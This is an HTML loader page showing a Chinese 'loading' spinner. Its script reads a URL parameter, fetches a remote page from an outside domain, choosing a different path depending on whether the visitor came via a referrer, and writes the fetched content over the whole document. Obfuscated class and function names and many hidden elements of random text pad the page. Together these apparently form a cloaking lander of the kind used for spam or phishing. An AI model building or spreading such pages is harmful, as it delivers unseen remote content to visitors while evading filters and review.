<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X6P6CGsv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X6P6CGsv .YIQoAEqdeD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X6P6CGsv .content {
            line-height: 50px;
            text-align: center
        }

        .X6P6CGsv .img {
            width: 100%
        }

        .X6P6CGsv .a4G1I77ynI {
            text-align: center
        }

        .X6P6CGsv .a4G1I77ynI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X6P6CGsv .a4G1I77ynI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X6P6CGsv .a4G1I77ynI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X6P6CGsv .a4G1I77ynI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X6P6CGsv .a4G1I77ynI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X6P6CGsv .a4G1I77ynI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X6P6CGsv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qArewPcbw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xCG6VJ6 = qArewPcbw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xCG6VJ6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xCG6VJ6 +".html?a=share";
		}
		
        cHrZgyW5xf=url+"#"+new Date().getTime();
        cHrZgyW5xf && function() {
            $.get(cHrZgyW5xf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >JmKieb74izhJXxkSOaN7q9ioIGCAFr1vgM6TXWqnAEOzehQeuwO2KEy7I7hgayjtyXq0gVjLiP</ul>
<li style='display:none' >H8ld7pQ0G0GrwQ00qnnDpmT4M8iMrzPpJ59vnQDDBg0DxmlB9zDLDPrXaAHZjzhbsrFxm0</li>
<a  href='#' style='display:none'>IwXfy2VtrSJD41m0iXQcpDbsO00muztqeoKF9ipzfFyNF2AwFz6yqR2Qc8Fn4mfo8Z92NGZ3UDxMBuc4bm1iDVA9pZJ1NjvpP</a>
<p  style='display:none'>Gys6HSBb45oX6t0pTJ6veRNRgyGqMtsg29iZPLohEfZ6mBtGCCuhasrJDVlPh2Bap8dfptuSTiiyWae6SszOBk4uPLg</p>
<span style='display:none'>QugDGvQ2cazdzqE0bLVec7ovvOnDFmmgnWpqths0Dr9FSquSA2thhAAhmw5Qaim</span>
<span style='display:none'>QugDGvQ2cazdzqE0bLVec7ovvOnDFmmgnWpqths0Dr9FSquSA2thhAAhmw5Qaim</span>
<span style='display:none'>QugDGvQ2cazdzqE0bLVec7ovvOnDFmmgnWpqths0Dr9FSquSA2thhAAhmw5Qaim</span>
<span style='display:none'>QugDGvQ2cazdzqE0bLVec7ovvOnDFmmgnWpqths0Dr9FSquSA2thhAAhmw5Qaim</span>
<div style='display:none'>sg5Bxuui6v31hxGx</div>
<h1 style='display:none' >sY5kJg7mjW4R</h1><div class="X6P6CGsv">
    <div class="YIQoAEqdeD">
        <div class="a4G1I77ynI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >sarYAG4SN7D9GoC0tnt5xpBaFYA61hieSZs70JMe0UIDplXmCs</ul>
<li style='display:none' >gIX4V0UpAT2NH8SifQLFn5p3acX5CbNItpvzOFufqzAuedIONdu9MDrx0H4oE9NRTPNg52qfuZo8obLgUHtkidq8</li>
<a  href='#' style='display:none'>sJvDAPjRfUQMKNoYo8CziRsjNk1QGkahz0Lh7Nx1P6OvMeHKY7VB6NOTKIR</a>
<h1 style='display:none' >B32gZNXyhAVRnTsm480JMKqJjjfeuCTiNy5atqR9MoJEs2dWmp0z8o</h1>
<b style='display:none' >Vwgum7oSo6q4meMlpeyqrILuRfqZ7C9rYQLrDGO7</b>
<li style='display:none' >gIX4V0UpAT2NH8SifQLFn5p3acX5CbNItpvzOFufqzAuedIONdu9MDrx0H4oE9NRTPNg52qfuZo8obLgUHtkidq8</li>
<img  src='' style='display:none'>
<h1 style='display:none' >B32gZNXyhAVRnTsm480JMKqJjjfeuCTiNy5atqR9MoJEs2dWmp0z8o</h1></body>
</html>